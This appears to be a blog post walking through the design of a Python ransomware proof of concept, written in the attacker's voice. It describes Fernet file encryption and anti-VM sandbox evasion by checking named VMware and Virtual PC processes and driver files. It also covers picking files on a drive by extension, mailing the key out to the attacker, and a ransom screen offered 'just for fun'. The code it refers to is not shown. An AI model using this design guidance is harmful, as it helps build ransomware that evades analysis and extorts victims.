Python Ransomware

Intro

This Python ransomware POC is one of the very few examples of Python-based ransomware in the wild. Python is typically considered to be a fast, easy language to code in. However, Python interpreter is an external software that needs to be installed on a Windows OS machine – the most popular among the attacker’s targets.

Yes, python is pre-installed one Linux machine, which can give us an advantage if we are targeting a company’s servers.

Python Encryption Library - Fernet

cryptography is an actively developed library that provides cryptographic recipes and primitives. It supports Python 2.6-2.7, and Python 3.3+.

cryptography is divided into two layers of recipes and hazardous materials (hazmat). The recipe layer provides a simple API for proper symmetric encryption and the hazmat layer provides low-level cryptographic primitives.

Example code using high-level symmetric encryption recipe:

Evasion

One of the features is an anti-VM evasion technique. If the malware detects that it is running in a VM environment, it will exit immediately.

Malware analysts and investigators often use isolated environments, such as virtual machines (VMs) or sandboxes, to analyze unknown code for malware. In the same manner security products often use VM’s and sandboxes to execute potentially malicious code before it is approved to enter the organizational network.

To evade analysis and bypass security systems we will often need to design their code to detect isolated environments. Once such an environment is detected the evasion mechanism may prevent the malicious code from running, or it may alter the malware’s behavior to avoid exposing malicious activity while running in a VM.

In our ransomware, we will try to detect the existence of unique VM processes such as:

· vmsrvc.exe – This service is part of the Virtual PC Virtual Machine Additions software. This software is installed into a virtual machine to increase its performance and provide further functionality when interacting with the host system.

· vmusrvc.exe – Part of "DOS_Virtual_Machine_Additions" for Microsoft Virtual_PC, software virtualization software that allows you to run multiple PC-based operating systems simultaneously on one workstation. This process provides additional functionalities such as Shared Folders.

· vmtoolsd.exe – VMware Tools Core Service from VMware, Inc.

We will also try to detect these paths:

· "C:\windows\system32\drivers\\vmci.sys" – VMware Virtual Machine Communication Interface (VMCI) Driver.

· "C:\windows\system32\drivers\\vmhgfs.sys" – part of VMware HGFS File System Driver and developed by VMware, Inc.

What Files To Encrypt

The first thing ransomware must do is to sneak into your system and find files to encrypt. We will search through volumes “D:\”.

This function uses the Python built-in module “os” to get the full path of non-directory files in the targeted drive and appends them to a list. Note that the targeted files are filtered with certain extensions, which means this ransomware only chooses certain types of files to encrypt –

Encryption Key

To encrypt a message, you will need a key (as previously discussed) and your message as type bytes (you can convert strings to bytes using .encode()).

It encrypts data passed as a parameter to the method. The outcome of this encryption is known as a “Fernet token” which is basically the ciphertext. The encrypted token also contains the current timestamp when it was generated in plaintext. The encrypt method throws an exception if the data is not in bytes.

Bonus:

In order to prevent the target to find the encryption key, we may send it by mail.

User Server

I added a user interface designated to give the target information about the decryption possibilities. Just for fun…😊

Conclusion

Currently, it appears that Python-based malware is still under early development, but as we described, it already has many dangerous features implemented. It is entirely possible that in the near future this new language will be launched into the wild just as dangerous as any other mature ransomware, but with the time required for upgrades and modifications significantly shortened due to the relative easiness of coding in Python. Moreover, since it is written in Python and compiled with PyInstaller, authors can easily change it to support other platforms, such as Linux and macOS.